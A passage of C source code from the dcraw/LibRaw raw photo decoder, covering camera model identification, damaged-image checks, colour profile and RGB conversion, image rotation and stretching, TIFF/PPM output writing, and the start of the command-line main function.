if (!strncmp(model, "DC290", 5))
iso_speed = 100;
if (!strncmp(model, "DC280", 5))
iso_speed = 70;
if (flen < 100000) {
raw_width = 256; width = 249;
pixel_aspect = (4.0*height) / (3.0*width);
} else {
raw_width = 512; width = 501;
pixel_aspect = (493.0*height) / (373.0*width);
}
top_margin = left_margin = 1;
colors = 4;
filters = 0x8d8d8d8d;
simple_coeff(1);
pre_mul[1] = 1.179;
pre_mul[2] = 1.209;
pre_mul[3] = 1.036;
load_raw = &CLASS eight_bit_load_raw;
} else if (!strcmp(model,"40")) {
strcpy (model, "DC40");
height = 512;
width = 768;
data_offset = 1152;
load_raw = &CLASS kodak_radc_load_raw;
tiff_bps = 12;
} else if (strstr(model,"DC50")) {
strcpy (model, "DC50");
height = 512;
width = 768;
iso_speed=84;
data_offset = 19712;
load_raw = &CLASS kodak_radc_load_raw;
} else if (strstr(model,"DC120")) {
strcpy (model, "DC120");
height = 976;
width = 848;
iso_speed=160;
pixel_aspect = height/0.75/width;
load_raw = tiff_compress == 7 ?
&CLASS kodak_jpeg_load_raw : &CLASS kodak_dc120_load_raw;
} else if (!strcmp(model,"DCS200")) {
thumb_height = 128;
thumb_width = 192;
thumb_offset = 6144;
thumb_misc = 360;
iso_speed=140;
write_thumb = &CLASS layer_thumb;
black = 17;
}
} else if (!strcmp(model,"Fotoman Pixtura")) {
height = 512;
width = 768;
data_offset = 3632;
load_raw = &CLASS kodak_radc_load_raw;
filters = 0x61616161;
simple_coeff(2);
} else if (!strncmp(model,"QuickTake",9)) {
if (head[5]) strcpy (model+10, "200");
fseek (ifp, 544, SEEK_SET);
height = get2();
width = get2();
data_offset = (get4(),get2()) == 30 ? 738:736;
if (height > width) {
SWAP(height,width);
fseek (ifp, data_offset-6, SEEK_SET);
flip = ~get2() & 3 ? 5:6;
}
filters = 0x61616161;
} else if (!strncmp(make,"Rollei",6) && !load_raw) {
switch (raw_width) {
case 1316:
height = 1030;
width = 1300;
top_margin = 1;
left_margin = 6;
break;
case 2568:
height = 1960;
width = 2560;
top_margin = 2;
left_margin = 8;
}
filters = 0x16161616;
load_raw = &CLASS rollei_load_raw;
}
else if (!strcmp(model,"GRAS-50S5C")) {
height = 2048;
width = 2440;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x49494949;
order = 0x4949;
maximum = 0xfffC;
} else if (!strcmp(model,"BB-500CL")) {
height = 2058;
width = 2448;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x94949494;
order = 0x4949;
maximum = 0x3fff;
} else if (!strcmp(model,"BB-500GE")) {
height = 2058;
width = 2456;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x94949494;
order = 0x4949;
maximum = 0x3fff;
} else if (!strcmp(model,"SVS625CL")) {
height = 2050;
width = 2448;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x94949494;
order = 0x4949;
maximum = 0x0fff;
}
/* Early reject for damaged images */
if (!load_raw || height < 22 || width < 22 ||
#ifdef LIBRAW_LIBRARY_BUILD
(tiff_bps > 16 && load_raw != &LibRaw::deflate_dng_load_raw)
#else
tiff_bps > 16
#endif
|| tiff_samples > 4 || colors > 4 || colors < 1
/* alloc in unpack() may be fooled by size adjust */
|| ( (int)width + (int)left_margin > 65535)
|| ( (int)height + (int)top_margin > 65535)
)
{
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_IDENTIFY,1,2);
#endif
return;
}
if (!model[0])
sprintf (model, "%dx%d", width, height);
if (filters == UINT_MAX) filters = 0x94949494;
if (thumb_offset && !thumb_height) {
fseek (ifp, thumb_offset, SEEK_SET);
if (ljpeg_start (&jh, 1)) {
thumb_width = jh.wide;
thumb_height = jh.high;
}
}
dng_skip:
#ifdef LIBRAW_LIBRARY_BUILD
if(dng_version) /* Override black level by DNG tags */
{
black = imgdata.color.dng_levels.dng_black;
int ll = LIM(0,
(sizeof(cblack)/sizeof(cblack[0])),
(sizeof(imgdata.color.dng_levels.dng_cblack)/sizeof(imgdata.color.dng_levels.dng_cblack[0])));
for(int i=0; i < ll; i++)
cblack[i] = imgdata.color.dng_levels.dng_cblack[i];
}
#endif
/* Early reject for damaged images */
if (!load_raw || height < 22 || width < 22 ||
#ifdef LIBRAW_LIBRARY_BUILD
(tiff_bps > 16 && load_raw != &LibRaw::deflate_dng_load_raw)
#else
tiff_bps > 16
#endif
|| tiff_samples > 4 || colors > 4 || colors < 1)
{
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_IDENTIFY,1,2);
#endif
return;
}
if ((use_camera_matrix & ((use_camera_wb || dng_version) | 0x2) )
&& cmatrix[0][0] > 0.125) {
memcpy (rgb_cam, cmatrix, sizeof cmatrix);
raw_color = 0;
}
if (raw_color) adobe_coeff (make, model);
#ifdef LIBRAW_LIBRARY_BUILD
else if(imgdata.color.cam_xyz[0][0]<0.01)
adobe_coeff (make, model,1);
#endif
if (load_raw == &CLASS kodak_radc_load_raw)
if (raw_color) adobe_coeff ("Apple","Quicktake");
#ifdef LIBRAW_LIBRARY_BUILD
// Clear erorneus fuji_width if not set through parse_fuji or for DNG
if(fuji_width && !dng_version && !(imgdata.process_warnings & LIBRAW_WARN_PARSEFUJI_PROCESSED ))
fuji_width = 0;
#endif
if (fuji_width)
{
fuji_width = width >> !fuji_layout;
filters = fuji_width & 1 ? 0x94949494 : 0x49494949;
width = (height >> fuji_layout) + fuji_width;
height = width - 1;
pixel_aspect = 1;
} else {
if (raw_height < height) raw_height = height;
if (raw_width < width ) raw_width = width;
}
if (!tiff_bps) tiff_bps = 12;
if (!maximum)
{
maximum = (1 << tiff_bps) - 1;
if(maximum < 0x10000 && curve[maximum]>0 && load_raw == &CLASS sony_arw2_load_raw)
maximum = curve[maximum];
}
if (!load_raw || height < 22 || width < 22 ||
#ifdef LIBRAW_LIBRARY_BUILD
(tiff_bps > 16 && load_raw != &LibRaw::deflate_dng_load_raw)
#else
tiff_bps > 16
#endif
|| tiff_samples > 6 || colors > 4)
is_raw = 0;
if(raw_width < 22 || raw_width > 64000 || raw_height < 22 || raw_width > 64000)
is_raw = 0;
#ifdef NO_JASPER
if (load_raw == &CLASS redcine_load_raw) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: You must link dcraw with %s!!\n"),
ifname, "libjasper");
#endif
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_JASPER;
#endif
}
#endif
#ifdef NO_JPEG
if (load_raw == &CLASS kodak_jpeg_load_raw ||
load_raw == &CLASS lossy_dng_load_raw) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: You must link dcraw with %s!!\n"),
ifname, "libjpeg");
#endif
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_JPEGLIB;
#endif
}
#endif
if (!cdesc[0])
strcpy (cdesc, colors == 3 ? "RGBG":"GMCY");
if (!raw_height) raw_height = height;
if (!raw_width ) raw_width = width;
if (filters > 999 && colors == 3)
filters |= ((filters >> 2 & 0x22222222) |
(filters << 2 & 0x88888888)) & filters << 1;
notraw:
if (flip == UINT_MAX) flip = tiff_flip;
if (flip == UINT_MAX) flip = 0;
// Convert from degrees to bit-field if needed
if(flip > 89 || flip < -89)
{
switch ((flip+3600) % 360)
{
case 270: flip = 5; break;
case 180: flip = 3; break;
case 90: flip = 6; break;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_IDENTIFY,1,2);
#endif
}
//@end COMMON
//@out FILEIO
#ifndef NO_LCMS
void CLASS apply_profile (const char *input, const char *output)
{
char *prof;
cmsHPROFILE hInProfile=0, hOutProfile=0;
cmsHTRANSFORM hTransform;
FILE *fp;
unsigned size;
if (strcmp (input, "embed"))
hInProfile = cmsOpenProfileFromFile (input, "r");
else if (profile_length) {
#ifndef LIBRAW_LIBRARY_BUILD
prof = (char *) malloc (profile_length);
merror (prof, "apply_profile()");
fseek (ifp, profile_offset, SEEK_SET);
fread (prof, 1, profile_length, ifp);
hInProfile = cmsOpenProfileFromMem (prof, profile_length);
free (prof);
#else
hInProfile = cmsOpenProfileFromMem (imgdata.color.profile, profile_length);
#endif
} else
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_EMBEDDED_PROFILE;
#endif
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s has no embedded profile.\n"), ifname);
#endif
}
if (!hInProfile)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_INPUT_PROFILE;
#endif
return;
}
if (!output)
hOutProfile = cmsCreate_sRGBProfile();
else if ((fp = fopen (output, "rb"))) {
fread (&size, 4, 1, fp);
fseek (fp, 0, SEEK_SET);
oprof = (unsigned *) malloc (size = ntohl(size));
merror (oprof, "apply_profile()");
fread (oprof, 1, size, fp);
fclose (fp);
if (!(hOutProfile = cmsOpenProfileFromMem (oprof, size))) {
free (oprof);
oprof = 0;
}
}
#ifdef DCRAW_VERBOSE
else
fprintf (stderr,_("Cannot open file %s!\n"), output);
#endif
if (!hOutProfile)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_OUTPUT_PROFILE;
#endif
goto quit;
}
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Applying color profile...\n"));
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_APPLY_PROFILE,0,2);
#endif
hTransform = cmsCreateTransform (hInProfile, TYPE_RGBA_16,
hOutProfile, TYPE_RGBA_16, INTENT_PERCEPTUAL, 0);
cmsDoTransform (hTransform, image, image, width*height);
raw_color = 1; /* Don't use rgb_cam with a profile */
cmsDeleteTransform (hTransform);
cmsCloseProfile (hOutProfile);
quit:
cmsCloseProfile (hInProfile);
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_APPLY_PROFILE,1,2);
#endif
}
#endif
//@end FILEIO
//@out COMMON
void CLASS convert_to_rgb()
{
#ifndef LIBRAW_LIBRARY_BUILD
int row, col, c;
#endif
int i, j, k;
#ifndef LIBRAW_LIBRARY_BUILD
ushort *img;
float out[3];
#endif
float out_cam[3][4];
double num, inverse[3][3];
static const double xyzd50_srgb[3][3] =
{ { 0.436083, 0.385083, 0.143055 },
{ 0.222507, 0.716888, 0.060608 },
{ 0.013930, 0.097097, 0.714022 } };
static const double rgb_rgb[3][3] =
{ { 1,0,0 }, { 0,1,0 }, { 0,0,1 } };
static const double adobe_rgb[3][3] =
{ { 0.715146, 0.284856, 0.000000 },
{ 0.000000, 1.000000, 0.000000 },
{ 0.000000, 0.041166, 0.958839 } };
static const double wide_rgb[3][3] =
{ { 0.593087, 0.404710, 0.002206 },
{ 0.095413, 0.843149, 0.061439 },
{ 0.011621, 0.069091, 0.919288 } };
static const double prophoto_rgb[3][3] =
{ { 0.529317, 0.330092, 0.140588 },
{ 0.098368, 0.873465, 0.028169 },
{ 0.016879, 0.117663, 0.865457 } };
static const double aces_rgb[3][3] =
{ { 0.432996, 0.375380, 0.189317 },
{ 0.089427, 0.816523, 0.102989 },
{ 0.019165, 0.118150, 0.941914 } };
static const double (*out_rgb[])[3] =
{ rgb_rgb, adobe_rgb, wide_rgb, prophoto_rgb, xyz_rgb, aces_rgb };
static const char *name[] =
{ "sRGB", "Adobe RGB (1998)", "WideGamut D65", "ProPhoto D65", "XYZ", "ACES" };
static const unsigned phead[] =
{ 1024, 0, 0x2100000, 0x6d6e7472, 0x52474220, 0x58595a20, 0, 0, 0,
0x61637370, 0, 0, 0x6e6f6e65, 0, 0, 0, 0, 0xf6d6, 0x10000, 0xd32d };
unsigned pbody[] =
{ 10, 0x63707274, 0, 36, /* cprt */
0x64657363, 0, 40, /* desc */
0x77747074, 0, 20, /* wtpt */
0x626b7074, 0, 20, /* bkpt */
0x72545243, 0, 14, /* rTRC */
0x67545243, 0, 14, /* gTRC */
0x62545243, 0, 14, /* bTRC */
0x7258595a, 0, 20, /* rXYZ */
0x6758595a, 0, 20, /* gXYZ */
0x6258595a, 0, 20 }; /* bXYZ */
static const unsigned pwhite[] = { 0xf351, 0x10000, 0x116cc };
unsigned pcurve[] = { 0x63757276, 0, 1, 0x1000000 };
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_CONVERT_RGB,0,2);
#endif
gamma_curve (gamm[0], gamm[1], 0, 0);
memcpy (out_cam, rgb_cam, sizeof out_cam);
#ifndef LIBRAW_LIBRARY_BUILD
raw_color |= colors == 1 || document_mode ||
output_color < 1 || output_color > 6;
#else
raw_color |= colors == 1 ||
output_color < 1 || output_color > 6;
#endif
if (!raw_color) {
oprof = (unsigned *) calloc (phead[0], 1);
merror (oprof, "convert_to_rgb()");
memcpy (oprof, phead, sizeof phead);
if (output_color == 5) oprof[4] = oprof[5];
oprof[0] = 132 + 12*pbody[0];
for (i=0; i < pbody[0]; i++) {
oprof[oprof[0]/4] = i ? (i > 1 ? 0x58595a20 : 0x64657363) : 0x74657874;
pbody[i*3+2] = oprof[0];
oprof[0] += (pbody[i*3+3] + 3) & -4;
}
memcpy (oprof+32, pbody, sizeof pbody);
oprof[pbody[5]/4+2] = strlen(name[output_color-1]) + 1;
memcpy ((char *)oprof+pbody[8]+8, pwhite, sizeof pwhite);
pcurve[3] = (short)(256/gamm[5]+0.5) << 16;
for (i=4; i < 7; i++)
memcpy ((char *)oprof+pbody[i*3+2], pcurve, sizeof pcurve);
pseudoinverse ((double (*)[3]) out_rgb[output_color-1], inverse, 3);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++) {
for (num = k=0; k < 3; k++)
num += xyzd50_srgb[i][k] * inverse[j][k];
oprof[pbody[j*3+23]/4+i+2] = num * 0x10000 + 0.5;
}
for (i=0; i < phead[0]/4; i++)
oprof[i] = htonl(oprof[i]);
strcpy ((char *)oprof+pbody[2]+8, "auto-generated by dcraw");
strcpy ((char *)oprof+pbody[5]+12, name[output_color-1]);
for (i=0; i < 3; i++)
for (j=0; j < colors; j++)
for (out_cam[i][j] = k=0; k < 3; k++)
out_cam[i][j] += out_rgb[output_color-1][i][k] * rgb_cam[k][j];
}
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr, raw_color ? _("Building histograms...\n") :
_("Converting to %s colorspace...\n"), name[output_color-1]);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
convert_to_rgb_loop(out_cam);
#else
memset (histogram, 0, sizeof histogram);
for (img=image[0], row=0; row < height; row++)
for (col=0; col < width; col++, img+=4) {
if (!raw_color) {
out[0] = out[1] = out[2] = 0;
FORCC {
out[0] += out_cam[0][c] * img[c];
out[1] += out_cam[1][c] * img[c];
out[2] += out_cam[2][c] * img[c];
}
FORC3 img[c] = CLIP((int) out[c]);
}
else if (document_mode)
img[0] = img[fcol(row,col)];
FORCC histogram[c][img[c] >> 3]++;
}
#endif
if (colors == 4 && output_color) colors = 3;
#ifndef LIBRAW_LIBRARY_BUILD
if (document_mode && filters) colors = 1;
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_CONVERT_RGB,1,2);
#endif
}
void CLASS fuji_rotate()
{
int i, row, col;
double step;
float r, c, fr, fc;
unsigned ur, uc;
ushort wide, high, (*img)[4], (*pix)[4];
if (!fuji_width) return;
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Rotating image 45 degrees...\n"));
#endif
fuji_width = (fuji_width - 1 + shrink) >> shrink;
step = sqrt(0.5);
wide = fuji_width / step;
high = (height - fuji_width) / step;
img = (ushort (*)[4]) calloc (high, wide*sizeof *img);
merror (img, "fuji_rotate()");
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_FUJI_ROTATE,0,2);
#endif
for (row=0; row < high; row++)
for (col=0; col < wide; col++) {
ur = r = fuji_width + (row-col)*step;
uc = c = (row+col)*step;
if (ur > height-2 || uc > width-2) continue;
fr = r - ur;
fc = c - uc;
pix = image + ur*width + uc;
for (i=0; i < colors; i++)
img[row*wide+col][i] =
(pix[ 0][i]*(1-fc) + pix[ 1][i]*fc) * (1-fr) +
(pix[width][i]*(1-fc) + pix[width+1][i]*fc) * fr;
}
free (image);
width = wide;
height = high;
image = img;
fuji_width = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_FUJI_ROTATE,1,2);
#endif
}
void CLASS stretch()
{
ushort newdim, (*img)[4], *pix0, *pix1;
int row, col, c;
double rc, frac;
if (pixel_aspect == 1) return;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_STRETCH,0,2);
#endif
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Stretching the image...\n"));
#endif
if (pixel_aspect < 1) {
newdim = height / pixel_aspect + 0.5;
img = (ushort (*)[4]) calloc (width, newdim*sizeof *img);
merror (img, "stretch()");
for (rc=row=0; row < newdim; row++, rc+=pixel_aspect) {
frac = rc - (c = rc);
pix0 = pix1 = image[c*width];
if (c+1 < height) pix1 += width*4;
for (col=0; col < width; col++, pix0+=4, pix1+=4)
FORCC img[row*width+col][c] = pix0[c]*(1-frac) + pix1[c]*frac + 0.5;
}
height = newdim;
} else {
newdim = width * pixel_aspect + 0.5;
img = (ushort (*)[4]) calloc (height, newdim*sizeof *img);
merror (img, "stretch()");
for (rc=col=0; col < newdim; col++, rc+=1/pixel_aspect) {
frac = rc - (c = rc);
pix0 = pix1 = image[c];
if (c+1 < width) pix1 += 4;
for (row=0; row < height; row++, pix0+=width*4, pix1+=width*4)
FORCC img[row*newdim+col][c] = pix0[c]*(1-frac) + pix1[c]*frac + 0.5;
}
width = newdim;
}
free (image);
image = img;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_STRETCH,1,2);
#endif
}
int CLASS flip_index (int row, int col)
{
if (flip & 4) SWAP(row,col);
if (flip & 2) row = iheight - 1 - row;
if (flip & 1) col = iwidth - 1 - col;
return row * iwidth + col;
}
//@end COMMON
struct tiff_tag {
ushort tag, type;
int count;
union { char c[4]; short s[2]; int i; } val;
};
struct tiff_hdr {
ushort t_order, magic;
int ifd;
ushort pad, ntag;
struct tiff_tag tag[23];
int nextifd;
ushort pad2, nexif;
struct tiff_tag exif[4];
ushort pad3, ngps;
struct tiff_tag gpst[10];
short bps[4];
int rat[10];
unsigned gps[26];
char t_desc[512], t_make[64], t_model[64], soft[32], date[20], t_artist[64];
};
//@out COMMON
void CLASS tiff_set (struct tiff_hdr *th, ushort *ntag,
ushort tag, ushort type, int count, int val)
{
struct tiff_tag *tt;
int c;
tt = (struct tiff_tag *)(ntag+1) + (*ntag)++;
tt->val.i = val;
if (type == 1 && count <= 4)
FORC(4) tt->val.c[c] = val >> (c << 3);
else if (type == 2) {
count = strnlen((char *)th + val, count-1) + 1;
if (count <= 4)
FORC(4) tt->val.c[c] = ((char *)th)[val+c];
} else if (type == 3 && count <= 2)
FORC(2) tt->val.s[c] = val >> (c << 4);
tt->count = count;
tt->type = type;
tt->tag = tag;
}
#define TOFF(ptr) ((char *)(&(ptr)) - (char *)th)
void CLASS tiff_head (struct tiff_hdr *th, int full)
{
int c, psize=0;
struct tm *t;
memset (th, 0, sizeof *th);
th->t_order = htonl(0x4d4d4949) >> 16;
th->magic = 42;
th->ifd = 10;
th->rat[0] = th->rat[2] = 300;
th->rat[1] = th->rat[3] = 1;
FORC(6) th->rat[4+c] = 1000000;
th->rat[4] *= shutter;
th->rat[6] *= aperture;
th->rat[8] *= focal_len;
strncpy (th->t_desc, desc, 512);
strncpy (th->t_make, make, 64);
strncpy (th->t_model, model, 64);
strcpy (th->soft, "dcraw v" DCRAW_VERSION);
t = localtime (×tamp);
sprintf (th->date, "%04d:%02d:%02d %02d:%02d:%02d",
t->tm_year+1900,t->tm_mon+1,t->tm_mday,t->tm_hour,t->tm_min,t->tm_sec);
strncpy (th->t_artist, artist, 64);
if (full) {
tiff_set (th, &th->ntag, 254, 4, 1, 0);
tiff_set (th, &th->ntag, 256, 4, 1, width);
tiff_set (th, &th->ntag, 257, 4, 1, height);
tiff_set (th, &th->ntag, 258, 3, colors, output_bps);
if (colors > 2)
th->tag[th->ntag-1].val.i = TOFF(th->bps);
FORC4 th->bps[c] = output_bps;
tiff_set (th, &th->ntag, 259, 3, 1, 1);
tiff_set (th, &th->ntag, 262, 3, 1, 1 + (colors > 1));
}
tiff_set (th, &th->ntag, 270, 2, 512, TOFF(th->t_desc));
tiff_set (th, &th->ntag, 271, 2, 64, TOFF(th->t_make));
tiff_set (th, &th->ntag, 272, 2, 64, TOFF(th->t_model));
if (full) {
if (oprof) psize = ntohl(oprof[0]);
tiff_set (th, &th->ntag, 273, 4, 1, sizeof *th + psize);
tiff_set (th, &th->ntag, 277, 3, 1, colors);
tiff_set (th, &th->ntag, 278, 4, 1, height);
tiff_set (th, &th->ntag, 279, 4, 1, height*width*colors*output_bps/8);
} else
tiff_set (th, &th->ntag, 274, 3, 1, "12435867"[flip]-'0');
tiff_set (th, &th->ntag, 282, 5, 1, TOFF(th->rat[0]));
tiff_set (th, &th->ntag, 283, 5, 1, TOFF(th->rat[2]));
tiff_set (th, &th->ntag, 284, 3, 1, 1);
tiff_set (th, &th->ntag, 296, 3, 1, 2);
tiff_set (th, &th->ntag, 305, 2, 32, TOFF(th->soft));
tiff_set (th, &th->ntag, 306, 2, 20, TOFF(th->date));
tiff_set (th, &th->ntag, 315, 2, 64, TOFF(th->t_artist));
tiff_set (th, &th->ntag, 34665, 4, 1, TOFF(th->nexif));
if (psize) tiff_set (th, &th->ntag, 34675, 7, psize, sizeof *th);
tiff_set (th, &th->nexif, 33434, 5, 1, TOFF(th->rat[4]));
tiff_set (th, &th->nexif, 33437, 5, 1, TOFF(th->rat[6]));
tiff_set (th, &th->nexif, 34855, 3, 1, iso_speed);
tiff_set (th, &th->nexif, 37386, 5, 1, TOFF(th->rat[8]));
if (gpsdata[1]) {
tiff_set (th, &th->ntag, 34853, 4, 1, TOFF(th->ngps));
tiff_set (th, &th->ngps, 0, 1, 4, 0x202);
tiff_set (th, &th->ngps, 1, 2, 2, gpsdata[29]);
tiff_set (th, &th->ngps, 2, 5, 3, TOFF(th->gps[0]));
tiff_set (th, &th->ngps, 3, 2, 2, gpsdata[30]);
tiff_set (th, &th->ngps, 4, 5, 3, TOFF(th->gps[6]));
tiff_set (th, &th->ngps, 5, 1, 1, gpsdata[31]);
tiff_set (th, &th->ngps, 6, 5, 1, TOFF(th->gps[18]));
tiff_set (th, &th->ngps, 7, 5, 3, TOFF(th->gps[12]));
tiff_set (th, &th->ngps, 18, 2, 12, TOFF(th->gps[20]));
tiff_set (th, &th->ngps, 29, 2, 12, TOFF(th->gps[23]));
memcpy (th->gps, gpsdata, sizeof th->gps);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS jpeg_thumb_writer (FILE *tfp,char *t_humb,int t_humb_length)
{
ushort exif[5];
struct tiff_hdr th;
fputc (0xff, tfp);
fputc (0xd8, tfp);
if (strcmp (t_humb+6, "Exif")) {
memcpy (exif, "\xff\xe1 Exif\0\0", 10);
exif[1] = htons (8 + sizeof th);
fwrite (exif, 1, sizeof exif, tfp);
tiff_head (&th, 0);
fwrite (&th, 1, sizeof th, tfp);
}
fwrite (t_humb+2, 1, t_humb_length-2, tfp);
}
void CLASS jpeg_thumb()
{
char *thumb;
thumb = (char *) malloc (thumb_length);
merror (thumb, "jpeg_thumb()");
fread (thumb, 1, thumb_length, ifp);
jpeg_thumb_writer(ofp,thumb,thumb_length);
free (thumb);
}
#else
void CLASS jpeg_thumb()
{
char *thumb;
ushort exif[5];
struct tiff_hdr th;
thumb = (char *) malloc (thumb_length);
merror (thumb, "jpeg_thumb()");
fread (thumb, 1, thumb_length, ifp);
fputc (0xff, ofp);
fputc (0xd8, ofp);
if (strcmp (thumb+6, "Exif")) {
memcpy (exif, "\xff\xe1 Exif\0\0", 10);
exif[1] = htons (8 + sizeof th);
fwrite (exif, 1, sizeof exif, ofp);
tiff_head (&th, 0);
fwrite (&th, 1, sizeof th, ofp);
}
fwrite (thumb+2, 1, thumb_length-2, ofp);
free (thumb);
}
#endif
void CLASS write_ppm_tiff()
{
struct tiff_hdr th;
uchar *ppm;
ushort *ppm2;
int c, row, col, soff, rstep, cstep;
int perc, val, total, t_white=0x2000;
#ifdef LIBRAW_LIBRARY_BUILD
perc = width * height * auto_bright_thr;
#else
perc = width * height * 0.01; /* 99th percentile white level */
#endif
if (fuji_width) perc /= 2;
if (!((highlight & ~2) || no_auto_bright))
for (t_white=c=0; c < colors; c++) {
for (val=0x2000, total=0; --val > 32; )
if ((total += histogram[c][val]) > perc) break;
if (t_white < val) t_white = val;
}
gamma_curve (gamm[0], gamm[1], 2, (t_white << 3)/bright);
iheight = height;
iwidth = width;
if (flip & 4) SWAP(height,width);
ppm = (uchar *) calloc (width, colors*output_bps/8);
ppm2 = (ushort *) ppm;
merror (ppm, "write_ppm_tiff()");
if (output_tiff) {
tiff_head (&th, 1);
fwrite (&th, sizeof th, 1, ofp);
if (oprof)
fwrite (oprof, ntohl(oprof[0]), 1, ofp);
} else if (colors > 3)
fprintf (ofp,
"P7\nWIDTH %d\nHEIGHT %d\nDEPTH %d\nMAXVAL %d\nTUPLTYPE %s\nENDHDR\n",
width, height, colors, (1 << output_bps)-1, cdesc);
else
fprintf (ofp, "P%d\n%d %d\n%d\n",
colors/2+5, width, height, (1 << output_bps)-1);
soff = flip_index (0, 0);
cstep = flip_index (0, 1) - soff;
rstep = flip_index (1, 0) - flip_index (0, width);
for (row=0; row < height; row++, soff += rstep) {
for (col=0; col < width; col++, soff += cstep)
if (output_bps == 8)
FORCC ppm [col*colors+c] = curve[image[soff][c]] >> 8;
else FORCC ppm2[col*colors+c] = curve[image[soff][c]];
if (output_bps == 16 && !output_tiff && htons(0x55aa) != 0x55aa)
swab ((char*)ppm2, (char*)ppm2, width*colors*2);
fwrite (ppm, colors*output_bps/8, width, ofp);
}
free (ppm);
}
//@end COMMON
int CLASS main (int argc, const char **argv)
{
int arg, status=0, quality, i, c;
int timestamp_only=0, thumbnail_only=0, identify_only=0;
int user_qual=-1, user_black=-1, user_sat=-1, user_flip=-1;
int use_fuji_rotate=1, write_to_stdout=0, read_from_stdin=0;
const char *sp, *bpfile=0, *dark_frame=0, *write_ext;
char opm, opt, *ofname, *cp;
struct utimbuf ut;
#ifndef NO_LCMS
const char *cam_profile=0, *out_profile=0;
#endif
#ifndef LOCALTIME
putenv ((char *) "TZ=UTC");
#endif
#ifdef LOCALEDIR
setlocale (LC_CTYPE, "");
setlocale (LC_MESSAGES, "");
bindtextdomain ("dcraw", LOCALEDIR);
textdomain ("dcraw");
#endif
if (argc == 1) {
printf(_("\nRaw photo decoder \"dcraw\" v%s"), DCRAW_VERSION);
printf(_("\nby Dave Coffin, dcoffin a cybercom o net\n"));
printf(_("\nUsage: %s [OPTION]... [FILE]...\n\n"), argv[0]);
puts(_("-v Print verbose messages"));
puts(_("-c Write image data to standard output"));
puts(_("-e Extract embedded thumbnail image"));
puts(_("-i Identify files without decoding them"));
puts(_("-i -v Identify files and show metadata"));
puts(_("-z Change file dates to camera timestamp"));
puts(_("-w Use camera white balance, if possible"));
puts(_("-a Average the whole image for white balance"));
puts(_("-A <x y w h> Average a grey box for white balance"));
puts(_("-r <r g b g> Set custom white balance"));
puts(_("+M/-M Use/don't use an embedded color matrix"));
puts(_("-C <r b> Correct chromatic aberration"));
puts(_("-P <file> Fix the dead pixels listed in this file"));
puts(_("-K <file> Subtract dark frame (16-bit raw PGM)"));
puts(_("-k <num> Set the darkness level"));
puts(_("-S <num> Set the saturation level"));
puts(_("-n <num> Set threshold for wavelet denoising"));
puts(_("-H [0-9] Highlight mode (0=clip, 1=unclip, 2=blend, 3+=rebuild)"));
puts(_("-t [0-7] Flip image (0=none, 3=180, 5=90CCW, 6=90CW)"));
puts(_("-o [0-5] Output colorspace (raw,sRGB,Adobe,Wide,ProPhoto,XYZ)"));
#ifndef NO_LCMS
puts(_("-o <file> Apply output ICC profile from file"));
puts(_("-p <file> Apply camera ICC profile from file or \"embed\""));
#endif
puts(_("-d Document mode (no color, no interpolation)"));
puts(_("-D Document mode without scaling (totally raw)"));
puts(_("-j Don't stretch or rotate raw pixels"));
puts(_("-W Don't automatically brighten the image"));
puts(_("-b <num> Adjust brightness (default = 1.0)"));
puts(_("-g <p ts> Set custom gamma curve (default = 2.222 4.5)"));
puts(_("-q [0-3] Set the interpolation quality"));
puts(_("-h Half-size color image (twice as fast as \"-q 0\")"));
puts(_("-f Interpolate RGGB as four colors"));
puts(_("-m <num> Apply a 3x3 median filter to R-G and B-G"));
puts(_("-s [0..N-1] Select one raw image or \"all\" from each file"));
puts(_("-6 Write 16-bit instead of 8-bit"));
puts(_("-4 Linear 16-bit, same as \"-6 -W -g 1 1\""));
puts(_("-T Write TIFF instead of PPM"));
puts("");
return 1;
}
argv[argc] = "";
for (arg=1; (((opm = argv[arg][0]) - 2) | 2) == '+'; ) {
opt = argv[arg++][1];
if ((cp = (char *) strchr (sp="nbrkStqmHACg", opt)))
for (i=0; i < "114111111422"[cp-sp]-'0'; i++)
if (!isdigit(argv[arg+i][0])) {
fprintf (stderr,_("Non-numeric argument to \"-%c\"\n"), opt);
return 1;
}
switch (opt) {
